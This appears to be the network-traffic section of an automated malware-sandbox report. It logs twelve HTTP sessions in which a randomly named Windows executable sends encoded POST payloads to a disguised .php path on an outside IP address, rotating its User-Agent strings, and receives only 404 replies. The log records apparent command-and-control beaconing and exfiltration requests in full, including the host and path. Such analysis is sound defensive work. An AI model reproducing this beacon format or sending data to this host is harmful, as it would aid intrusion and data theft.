                                                  Nov 19, 2024 18:55:24.365673065 CET4998780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:24.370810032 CET804998738.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:24.637973070 CET804998738.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:24.693634033 CET4998780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:24.769146919 CET804998738.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:24.818681955 CET4998780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:25.277937889 CET4998780192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:34.577538013 CET4998880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:34.582511902 CET804998838.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:34.582640886 CET4998880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:34.582887888 CET4998880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:34.587749004 CET804998838.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:34.927855968 CET4998880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:34.932760954 CET804998838.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:35.236042023 CET804998838.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:35.287033081 CET4998880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:35.371102095 CET804998838.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:35.412009954 CET4998880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:35.458297014 CET4998880192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:46.203206062 CET4998980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:46.208287001 CET804998938.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:46.208410978 CET4998980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:46.208605051 CET4998980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:46.213486910 CET804998938.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:46.552829027 CET4998980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:46.557823896 CET804998938.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:46.828692913 CET804998938.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:46.880784035 CET4998980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:46.940787077 CET4998980192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:57.621359110 CET4999080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:57.626440048 CET804999038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:57.626513004 CET4999080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:57.626796007 CET4999080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:57.631541014 CET804999038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:57.974956036 CET4999080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:57.979783058 CET804999038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:58.454690933 CET804999038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:58.455607891 CET804999038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:58.455622911 CET804999038.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:55:58.455712080 CET4999080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:55:58.874028921 CET4999080192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:56:08.013892889 CET4999180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:56:08.018763065 CET804999138.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:56:08.018841028 CET4999180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:56:08.019062996 CET4999180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:56:08.023873091 CET804999138.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:56:08.365339041 CET4999180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:56:08.400876045 CET804999138.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:56:08.669126034 CET804999138.180.228.120192.168.2.7
                                                  Nov 19, 2024 18:56:08.708972931 CET4999180192.168.2.738.180.228.120
                                                  Nov 19, 2024 18:56:08.740361929 CET4999180192.168.2.738.180.228.120
                                                  • 38.180.228.120
                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  0 | 192.168.2.7 | 49742 | 38.180.228.120 | 80 | 7644 | C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:52:21.881669998 CET | 450 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:52:22.241193056 CET344OUTData Raw: 05 00 01 02 06 0a 01 05 05 06 02 01 02 0d 01 04 00 0a 05 01 02 01 03 0e 02 0f 0d 0c 04 04 00 50 0f 56 06 0d 07 00 03 00 0f 0b 07 04 04 05 07 53 06 54 0c 5d 0d 07 06 02 04 55 03 00 06 50 04 01 00 54 0e 0f 00 00 01 03 0f 01 0d 00 0a 03 0f 09 05 51
                                                  Data Ascii: PVST]UPTQ^UQ\L~@|a\w[r]b[]Poj^cUs\ksh{glYi[|Sx`Is[u~V@{C\~bi
                                                  Nov 19, 2024 18:52:22.530540943 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:52:22.662048101 CET | 493 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:52:22 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  1 | 192.168.2.7 | 49822 | 38.180.228.120 | 80 | 7996 | C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:52:34.766849041 CET | 467 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:52:35.236293077 CET344OUTData Raw: 05 02 01 00 06 0f 01 04 05 06 02 01 02 03 01 06 00 05 05 0d 02 05 03 08 02 52 0d 02 05 0f 03 05 0c 06 05 0d 03 0d 06 01 0c 54 06 0b 06 05 04 07 05 05 0d 0a 0f 03 05 52 06 03 05 01 04 05 06 0e 05 01 0a 0a 00 07 05 02 0d 03 0d 02 0f 00 0e 08 07 57
                                                  Data Ascii: RTRWS^R\L}P`_[criae`|letBl|]toBwKxs}X}~pct`~O~V@{mn}bq
                                                  Nov 19, 2024 18:52:35.389852047 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:52:35.520869017 CET | 493 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:52:35 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  2 | 192.168.2.7 | 49882 | 38.180.228.120 | 80 | 1412 | C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:52:45.433948040 CET | 414 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:52:45.787472010 CET344OUTData Raw: 00 06 01 02 06 0d 01 02 05 06 02 01 02 07 01 07 00 01 05 00 02 03 03 09 03 04 0d 00 05 07 03 09 0d 0f 03 09 01 54 03 0a 0e 05 07 05 04 07 07 04 04 50 0f 08 0c 07 04 05 07 03 06 54 04 05 07 5d 00 53 0a 00 04 0e 05 05 0e 04 0c 01 0f 00 0c 54 05 04
                                                  Data Ascii: TPT]ST]XU\L}S|cu\`[qbehAhlzYclZMxDoBElYv}}|vg{Zie~V@A{}~~Lu
                                                  Nov 19, 2024 18:52:46.052722931 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:52:46.184705019 CET | 493 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:52:45 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  3 | 192.168.2.7 | 49962 | 38.180.228.120 | 80 | 3232 | C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:52:59.172427893 CET | 467 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:52:59.521519899 CET344OUTData Raw: 00 0a 04 05 03 08 01 04 05 06 02 01 02 02 01 0a 00 01 05 0f 02 01 03 09 02 56 0f 57 06 02 03 05 0e 0f 04 0f 03 06 04 0b 0c 54 06 03 07 04 04 0e 07 07 0e 01 0f 03 06 06 07 02 05 00 04 0a 06 08 03 01 0e 0f 07 0e 07 51 0b 00 0d 0e 0c 03 0e 09 07 06
                                                  Data Ascii: VWTQW_UR\L}PhN~@vbyaflk|\^wRw]~cpK{l]zs}Yk|tI^ju~V@zm~~bu
                                                  Nov 19, 2024 18:52:59.818136930 CET | 518 | IN | HTTP/1.1 100 Continue
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:52:59 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  4 | 192.168.2.7 | 49975 | 38.180.228.120 | 80 | 3620 | C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:53:10.145323038 CET | 467 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:53:10.493841887 CET344OUTData Raw: 05 07 01 05 06 0a 04 00 05 06 02 01 02 04 01 07 00 0a 05 08 02 02 03 0a 07 02 0e 07 06 04 06 05 0a 01 06 0e 01 54 05 07 0f 02 02 00 07 00 02 06 04 06 0f 0a 0d 02 04 00 01 03 06 54 05 04 04 0c 01 02 0a 00 07 0e 04 54 0c 00 0f 01 0c 05 0e 04 07 50
                                                  Data Ascii: TTTPTWU\L~@hcjt[}v[cT~ob\tos^k]`Iy|Yxcz|~lC`YoZ}_~V@@{}\A~\y
                                                  Nov 19, 2024 18:53:10.785850048 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:53:10.913754940 CET | 493 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:53:10 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  5 | 192.168.2.7 | 49976 | 38.180.228.120 | 80 | 3616 | C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:53:22.609935999 CET | 467 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:53:22.958986998 CET344OUTData Raw: 00 01 04 01 06 09 01 02 05 06 02 01 02 02 01 06 00 04 05 08 02 04 03 09 03 56 0c 04 04 00 06 06 0c 02 06 5e 02 0c 03 0a 0d 0b 04 03 04 0a 07 56 06 06 0e 0b 0f 00 04 06 06 55 03 07 07 01 07 01 01 0b 0f 0e 06 01 01 02 0d 03 0c 04 0a 03 0d 07 05 03
                                                  Data Ascii: V^VU\\P\L}P~czt\[bfP|uMwUk_hctDy|[o^b|Shwk\}_~V@{mTA}ru
                                                  Nov 19, 2024 18:53:23.262121916 CET | 518 | IN | HTTP/1.1 100 Continue
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:53:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  6 | 192.168.2.7 | 49977 | 38.180.228.120 | 80 | 5352 | C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:53:32.769346952 CET | 450 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:53:33.115202904 CET344OUTData Raw: 00 0a 01 06 06 0a 01 05 05 06 02 01 02 07 01 04 00 02 05 09 02 07 03 0b 07 00 0f 01 03 02 00 08 0f 0f 06 0b 03 07 03 0a 0d 00 05 00 00 02 06 05 07 04 0c 5e 0e 00 04 07 06 04 04 56 06 06 07 0b 02 07 0d 0b 00 04 06 01 0c 50 0b 03 0c 0d 0e 07 05 57
                                                  Data Ascii: ^VPW[W\L}PNzNvriLv`~o~YwB^Mt{olX{`bImltd|u~V@A{CrN}L}
                                                  Nov 19, 2024 18:53:33.436414957 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:53:33.563729048 CET | 493 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:53:33 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  7 | 192.168.2.7 | 49978 | 38.180.228.120 | 80 | 7648 | C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:53:45.298579931 CET | 450 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:53:45.646473885 CET | 344 | OUT | Data Raw: 00 04 04 03 06 09 04 05 05 06 02 01 02 02 01 02 00 06 05 0c 02 01 03 0a 01 00 0c 05 05 02 03 08 0f 52 04 01 03 06 04 57 0c 07 05 0a 00 04 05 52 07 03 0d 0e 0f 01 05 0a 05 07 05 06 04 52 07 0c 01 07 0e 01 05 56 01 05 0d 01 0e 05 0d 51 0e 04 05 57
                                                  Data Ascii: RWRRVQWR\L}U|`~tqaMuKPkUvXwB`hMtloxZo^zTttt|~O~V@xmb~by
                                                  Nov 19, 2024 18:53:46.097109079 CET | 518 | IN | HTTP/1.1 100 Continue
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:53:45 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  8 | 192.168.2.7 | 49979 | 38.180.228.120 | 80 | 6484 | C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:53:58.539840937 CET | 467 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                  Host: 38.180.228.120
                                                  Content-Length: 336
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:53:58.899311066 CET | 336 | OUT | Data Raw: 00 01 01 00 03 0d 01 07 05 06 02 01 02 05 01 0a 00 04 05 0d 02 06 03 01 00 00 0f 01 07 07 00 02 0d 55 06 00 01 0c 07 01 0b 00 07 07 00 07 05 02 07 02 0c 5e 0c 57 04 57 06 55 04 50 04 00 00 0e 03 06 0f 5e 07 00 07 02 0f 05 0c 54 0f 00 0f 06 06 03
                                                  Data Ascii: U^WWUP^TWRU\L~|NXNtLyu[xRrXtBxL|p`y|UJop}ZkSsSvg|Oi_~V@{CbOey
                                                  Nov 19, 2024 18:53:59.181468964 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:53:59.315306902 CET | 493 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:53:59 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  9 | 192.168.2.7 | 49980 | 38.180.228.120 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:54:08.745819092 CET | 414 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:54:09.099478960 CET | 344 | OUT | Data Raw: 05 02 04 04 03 08 01 05 05 06 02 01 02 0c 01 06 00 04 05 09 02 03 03 0f 00 55 0f 00 06 54 01 50 0c 06 06 0a 07 0d 07 52 0b 05 05 04 07 54 07 06 03 05 0e 0d 0a 04 05 0b 04 50 07 03 06 56 05 5b 01 00 0d 59 05 00 06 01 0c 52 0d 06 0f 03 0d 00 05 04
                                                  Data Ascii: UTPRTPV[YRUV\L~cbt[muucTkRyLwt|s^{UgKlbkCRcwpiO~V@{mTN~LS
                                                  Nov 19, 2024 18:54:09.389152050 CET | 518 | IN | HTTP/1.1 100 Continue
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:54:09 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  10 | 192.168.2.7 | 49981 | 38.180.228.120 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:54:20.179734945 CET | 402 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:54:20.536990881 CET | 344 | OUT | Data Raw: 05 01 01 00 03 0c 04 00 05 06 02 01 02 04 01 0a 00 03 05 0d 02 07 03 0a 03 56 0e 01 06 52 01 08 0d 55 04 09 01 06 04 0a 0b 0a 05 01 07 51 02 07 04 04 0b 0a 0a 00 04 55 01 06 03 02 04 04 06 00 03 03 0d 0c 00 03 06 53 0b 02 0d 03 0f 04 0f 03 05 01
                                                  Data Ascii: VRUQUSZUWS\L~h^fwqiLbflOkUuMtBcX]o_{BcHx^r}}t@cgt~_~V@@zmv}Ly
                                                  Nov 19, 2024 18:54:20.817892075 CET | 518 | IN | HTTP/1.1 100 Continue
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:54:20 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  11 | 192.168.2.7 | 49982 | 38.180.228.120 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 18:54:29.562922001 CET | 402 | OUT | POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:54:29.912136078 CET | 344 | OUT | Data Raw: 05 07 04 01 06 09 01 01 05 06 02 01 02 04 01 03 00 03 05 08 02 06 03 0d 07 01 0e 02 03 03 06 01 0d 53 04 59 03 04 05 52 0d 02 06 0a 00 0b 02 01 06 53 0c 0d 0f 57 06 52 01 0f 04 57 07 04 06 00 00 57 0d 0c 04 07 07 08 0d 02 0f 07 0d 04 0f 03 07 03
                                                  Data Ascii: SYRSWRWWP\L~k`vtLuv[|A|Bf]vowY|MoXoBx_xsfhS]RtYk_ie~V@@x}vA}\e
                                                  Nov 19, 2024 18:54:30.216788054 CET | 25 | IN | HTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:54:30.349965096 CET | 493 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:54:30 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
